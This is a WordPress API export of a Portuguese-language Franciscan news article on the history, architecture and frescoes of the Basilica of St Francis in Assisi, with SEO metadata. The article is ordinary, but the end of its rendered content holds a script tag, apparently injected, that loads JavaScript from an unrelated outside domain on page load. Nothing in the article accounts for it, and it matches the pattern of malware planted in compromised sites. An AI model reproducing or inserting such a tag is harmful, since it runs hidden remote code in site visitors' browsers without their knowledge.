{"id":59931,"date":"2018-05-24T00:39:53","date_gmt":"2018-05-24T03:39:53","guid":{"rendered":"http:\/\/new.franciscanos.org.br\/?p=36942"},"modified":"2019-07-09T09:34:45","modified_gmt":"2019-07-09T12:34:45","slug":"dedicacao-da-basilica-de-sao-francisco-de-assis-2-2","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html","title":{"rendered":"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg\" alt=\"basilica_240518_1\" width=\"830\" height=\"346\" \/><\/p>\n<p>Imediatamente ap\u00f3s a canoniza\u00e7\u00e3o, que ocorreu em 16 de julho de 1228, o Papa Greg\u00f3rio IX quis que em honra a S\u00e3o Francisco, o \u201cPoverello de Assis\u201d, fosse elevado um magn\u00edfico templo e ali seus restos mortais fossem preservados. O mesmo Pont\u00edfice aben\u00e7oou a pedra fundamental em 17 de Julho de 1228 e, na festa de Pentecostes, 25 de maio de 1230, ordenou que o corpo do santo foi transportado da igreja de S\u00e3o Jorge para a nova bas\u00edlica, a igreja-m\u00e3e da Ordem dos Ordem dos Frades Menores. Inoc\u00eancio IV a consagrou solenemente em 1253, elevando \u00e0 bas\u00edlica patriarcal e capela papal por Bento XIV em 1764.<\/p>\n<p>S\u00e3o Francisco queria morrer perto da Porci\u00fancula, onde havia iniciado a vida religiosa. Mas aquele que havia escolhido a pobreza como um caminho para amar e deixava-a como heran\u00e7a a seus filhos.<\/p>\n<p>A constru\u00e7\u00e3o da bas\u00edlica superior come\u00e7ou logo ap\u00f3s 1239 e foi finalizada em 1253. Sua arquitetura \u00e9 uma s\u00edntese do Rom\u00e2nico e do G\u00f3tico Italiano. As igrejas foram decoradas pelos maiores artistas daquele tempo, vindos de Roma, Toscana e \u00dambria. A igreja inferior tem afrescos de Cimabue e Giotto; na igreja superior est\u00e1 uma s\u00e9rie de afrescos com cenas da vida de S\u00e3o Francisco, tamb\u00e9m atribu\u00edda a Giotto e seus seguidores. A Bas\u00edlica \u00e9 administrada pelos Frades Menores Conventuais (OFM Conv). Os Frades Franciscanos Conventuais s\u00e3o os guardi\u00e3es dos restos mortais do Santo de Assis.<\/p>\n<p>No dia 26 de setembro de 1997, Assis foi atingida por dois fortes terremotos que danificaram severamente a bas\u00edlica (parte do teto dela ruiu durante o segundo tremor, destruindo um afresco de Cimabue), que passou dois anos fechada para restaura\u00e7\u00e3o.<\/p>\n<p>A Bas\u00edlica inferior, que representaria a penit\u00eancia, consiste em uma nave central com v\u00e1rias capelas laterais com arcos semicirculares. A nave \u00e9 decorada com os afrescos mais antigos da igreja, criados por um artista chamado Mestre de S\u00e3o Francisco. Eles mostram cinco cenas da Paix\u00e3o de Cristo \u00e0 direita, e \u00e0 esquerda, cenas da vida de S\u00e3o Francisco. Esses afrescos foram finalizados em 1260-1263. S\u00e3o considerados os melhores exemplos da pintura mural da Toscana, antes de Cimabue.<\/p>\n<p>Como a popularidade da igreja aumentou, capelas laterais para fam\u00edlias nobres foram adicionadas entre 1270 e 1350, destruindo os afrescos na paredes. A primeira capela \u00e0 esquerda \u00e9 decorada com dez afrescos de Simone Martini. Esses est\u00e3o entre os maiores trabalhos de Martini e os melhores exemplos da pintura do s\u00e9culo XIV.<\/p>\n<p>A nave termina em uma abside semicircular ricamente decorada, precedida por um transepto. Os afrescos no transepto direito mostram a inf\u00e2ncia de Cristo, feitos parcialmente por Giotto e seus aprendizes e a Natividade pelo an\u00f4nimo Mestre di San Nicola. O n\u00edvel inferior mostra tr\u00eas afrescos representando S\u00e3o Francisco ajudando duas crian\u00e7as. Esses afrescos de Giotto foram revolucion\u00e1rios para a \u00e9poca, pois mostravam pessoas reais com emo\u00e7\u00f5es em uma paisagem realista.<\/p>\n<p>Na parede do transepto, Cimabue pintou uma de suas obras mais famosas: Nossa Senhora com S\u00e3o Francisco, Anjos e Santos (1280). Esse \u00e9 provavelmente o retrato mais assemelhado a S\u00e3o Francisco. A pintura est\u00e1tica em estilo g\u00f3tico contrasta com as pinturas din\u00e2micas de Giotto. O transepto esquerdo foi decorado pelo pintor Pietro Lorenzetti e seus aprendizes entre 1315 e 1330. Os afrescos mostram seis cenas da Paix\u00e3o de Cristo, sendo a mais impressionante a Descida da Cruz, onde se percebe a sombra em uma pintura pela primeira vez desde a Antiguidade.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/assis_240518.jpg\" alt=\"assis_240518\" width=\"830\" height=\"290\" \/><\/p>\n<h4><strong>Cripta com t\u00famulo de S\u00e3o Francisco de Assis<\/strong><\/h4>\n<p>Pela nave se pode descer para a cripta atrav\u00e9s de uma escadaria dupla. Esse local, que guarda o t\u00famulo de Francisco foi descoberto em 1818.<\/p>\n<p>O t\u00famulo tinha sido escondido por Frei Elia para evitar que suas rel\u00edquias se espalhassem pela Europa medieval. Por ordem do Papa Pio IX, uma cripta foi constru\u00edda embaixo da Bas\u00edlica inferior. Foi projetada por Pasquale Belli com m\u00e1rmore fino em estilo neocl\u00e1ssico, mas foi redesenhada em pedra crua em estilo neo-Rom\u00e2nico por Ugo Tarchi entre 1925 e 1932.<\/p>\n<p>Ao lado da Bas\u00edlica, fica o Sacro Convento, que se assemelha a uma fortaleza e que j\u00e1 era habitado em 1230. O Convento agora abriga uma vasta biblioteca (com obras medievais), um museu com obras de arte doadas por peregrinos pelos s\u00e9culos e tamb\u00e9m 57 obras (principalmente das Escolas Florentina e Sienesa) da Cole\u00e7\u00e3o Perkins.<\/p>\n<h4><strong>Nave da Bas\u00edlica superior<\/strong><\/h4>\n<p>A entrada da Bas\u00edlica superior (que representa a gl\u00f3ria) \u00e9 pela arcada do convento dos frades. O estilo dessa \u00e1rea \u00e9 completamente diferente da Bas\u00edlica inferior. Grandes janelas de vidro colorido banham com luz as obras de Giotto e Cimabue.<\/p>\n<p>A parte final ao oeste do transepto e a abside foram decoradas com v\u00e1rios afrescos de Cimabue e seus aprendizes (1280). Infelizmente, devido ao material usado na obra, os afrescos logo sofreram os efeitos da umidade. Est\u00e3o hoje muito deteriorados e foram quase reduzidos a meros negativos fotogr\u00e1ficos.<\/p>\n<p>A parte superior, em ambos os lados da nave, muito danificada pelos terremotos de 1997, foi decorada em duas filas com um total de 32 cenas do Velho Testamento e do Novo Testamento. Como levava cerca de seis meses para que se pintasse apenas uma parte da nave, diferentes artistas romanos e toscanos, seguidores de Cimabue, trabalharam na obra, tais como Giacomo, Jacopo Torriti e Pietro Cavallini.<\/p>\n<p>Mas a obra mais importante da Bas\u00edlica \u00e9, sem d\u00favida, a s\u00e9rie de 28 afrescos atribu\u00eddos a um jovem Giotto na parte baixa da nave. Giotto usou a Legenda Maior, a biografia de Francisco para reconstruir os maiores eventos da vida do santo. As pinturas s\u00e3o v\u00edvidas, como se Giotto tivesse sido uma testemunha ocular da hist\u00f3ria. Os afrescos foram executados entre 1296 e 1304. Contudo, a autoria da obra ainda \u00e9 debatida. Alguns cr\u00edticos acreditam que a s\u00e9rie tenha sido feita por um grupo de artistas inspirados em Giotto.<\/p>\n<p><iframe loading=\"lazy\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/A09vVel48UA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Festa Franciscana<\/p>\n","protected":false},"author":1,"featured_media":207434,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[1181,1249],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Festa Franciscana\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-24T03:39:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-07-09T12:34:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html\",\"name\":\"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#primaryimage\"},\"datePublished\":\"2018-05-24T03:39:53+00:00\",\"dateModified\":\"2019-07-09T12:34:45+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html","og_locale":"pt_BR","og_type":"article","og_title":"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco - Not\u00edcias - Franciscanos","og_description":"Festa Franciscana","og_url":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-24T03:39:53+00:00","article_modified_time":"2019-07-09T12:34:45+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/basilica_240518_1.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html","name":"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#primaryimage"},"datePublished":"2018-05-24T03:39:53+00:00","dateModified":"2019-07-09T12:34:45+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/dedicacao-da-basilica-de-sao-francisco-de-assis-2-2.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Hoje, dedica\u00e7\u00e3o da Bas\u00edlica de S\u00e3o Francisco"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/59931"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=59931"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/59931\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/207434"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=59931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=59931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=59931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}